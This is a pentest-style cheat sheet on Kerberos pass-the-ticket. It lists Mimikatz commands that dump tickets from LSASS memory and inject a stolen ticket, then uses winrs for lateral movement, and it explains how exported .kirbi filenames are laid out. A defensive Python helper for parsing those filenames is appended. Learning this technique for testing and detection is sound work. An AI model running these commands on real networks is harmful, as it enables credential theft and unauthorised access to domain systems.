
Pass The Ticket

Required Privileges: Administrators
  • Extracting Ticket Granting Services Will Require us to have Administrator's Credentials.
Required Privileges: Standard
  • Injecting Tickets in our own Session Doesn't Require Administrator Privileges.

Sometimes it will be possible to extract Kerberos Tickets and Session Keys from LSASS Memory using Mimikatz. The process usually requires us to have SYSTEM Privileges on the Target Machine.


privilege::debug
sekurlsa::tickets /export

While Mimikatz can extract any TGT or TGS available in the memory of the LSASS process, most of the time we'll be interested in TGTs, as they can be used to request access to any service the user is allowed to access. TGSs, on the other hand, are only good for one specific service.

Extracting TGTs will require us to have Administrator's Credentials, while extracting TGSs can be done with a Low-Privileged Account [only the ones assigned to that Account].


Using the Ticket

:: Injecting the Ticket
kerberos::ptt [0;e06e9]-0-0-40a50000-delilah.gomez@LDAP-DC.DOMAIN.com.kirbi

Injecting Tickets in our own Session doesn't require Administrator Privileges. After this, the tickets will be available for any Tools we use for Lateral Movement.

:: Displays a list of currently Cached Kerberos Tickets
klist

Once we have a Command Prompt with the Credentials Loaded, we can use winrs to connect to another TARGET on the Domain, since the Credentials are Injected into our Session.

:: The [Username - Password] Fields are not Necessary because the Credentials are already Injected
winrs.exe -r:TARGET cmd

Deeper Explanation

Once the Tickets are Extracted they are going to be Available in the same Folder as Mimikatz.

[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-DOMAIN.COM.kirbi
└───────┘ ^ └────────┘ └─────────────┘ └───────────────┘└────┘
|         | |          |               |                └─► 6. File Extension
|         | |          |               └──────────────────► 5. Resource
|         | |          └──────────────────────────────────► 4. User / Computer Account [Ticket Owner]
|         | └─────────────────────────────────────────────► 3. 0x40e10000 Kerberos Flags
|         └───────────────────────────────────────────────► 2. Kerberos Ticket Type (0 = TGS / 1 = Client Ticket / 2 = TGT)
└─────────────────────────────────────────────────────────► 1. 0x97d82 User LUID
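As an added example (not code from the original page), the helper below splits an exported .kirbi filename into the fields labelled above and decodes the flags value into its RFC 4120 TicketFlags names, so a responder who finds such files on a host can quickly inventory which logon sessions and accounts they came from. The unlabelled third numeric field is assumed here to be a per-type sequence number, and the function names `flag_names`, `parse_kirbi_name` and `tgt_owners` are choices made for this example.

```python
"""Parse the names Mimikatz gives to exported .kirbi files (responder triage)."""
import re
from typing import Dict, List

# Layout from the diagram above: [LUID]-<type>-<n>-<flags>-<client>@<resource>.kirbi
# <n> is not labelled on the page; it is assumed to be a per-type sequence number.
KIRBI_NAME = re.compile(
    r"^\[(?P<hi>[0-9a-f]+);(?P<lo>[0-9a-f]+)\]-(?P<type>\d)-(?P<n>\d+)"
    r"-(?P<flags>[0-9a-f]{8})-(?P<client>[^@]+)@(?P<resource>.+)\.kirbi$",
    re.IGNORECASE,
)
TICKET_TYPES = {0: "TGS", 1: "Client Ticket", 2: "TGT"}

# RFC 4120 TicketFlags: bit b is mask 1 << (31 - b) in the 32-bit value that
# klist prints. Bit 15 is the Microsoft name_canonicalize flag klist also shows.
TICKET_FLAG_BITS = {
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may_postdate", 6: "postdated", 7: "invalid", 8: "renewable",
    9: "initial", 10: "pre_authent", 11: "hw_authent",
    12: "transited_policy_checked", 13: "ok_as_delegate", 15: "name_canonicalize",
}

def flag_names(flags: int) -> List[str]:
    """Names of the TicketFlags bits set in a raw 32-bit value such as 0x40e10000."""
    return [name for bit, name in TICKET_FLAG_BITS.items() if flags & (1 << (31 - bit))]

def parse_kirbi_name(filename: str) -> Dict[str, object]:
    """Split an exported .kirbi filename into its labelled fields."""
    m = KIRBI_NAME.match(filename)
    if not m:
        raise ValueError(f"not a Mimikatz .kirbi export name: {filename!r}")
    flags = int(m["flags"], 16)
    return {
        "luid": (int(m["hi"], 16) << 32) | int(m["lo"], 16),  # logon session
        "ticket_type": TICKET_TYPES.get(int(m["type"]), "unknown"),
        "flags": flags,
        "flag_names": flag_names(flags),
        "client": m["client"],      # ticket owner (user or computer account)
        "resource": m["resource"],  # service and realm the ticket is for
    }

def tgt_owners(filenames: List[str]) -> Dict[int, List[str]]:
    """Map each logon session LUID to accounts whose TGTs appear in an export."""
    found: Dict[int, List[str]] = {}
    for name in filenames:
        t = parse_kirbi_name(name)
        if t["ticket_type"] == "TGT":
            found.setdefault(t["luid"], []).append(t["client"])
    return found
```

Run against the two filenames shown on this page, the TGT decodes to forwardable/renewable/initial/pre_authent/name_canonicalize and the LDAP TGS to forwardable/renewable/pre_authent/ok_as_delegate/name_canonicalize, matching what klist prints for such tickets.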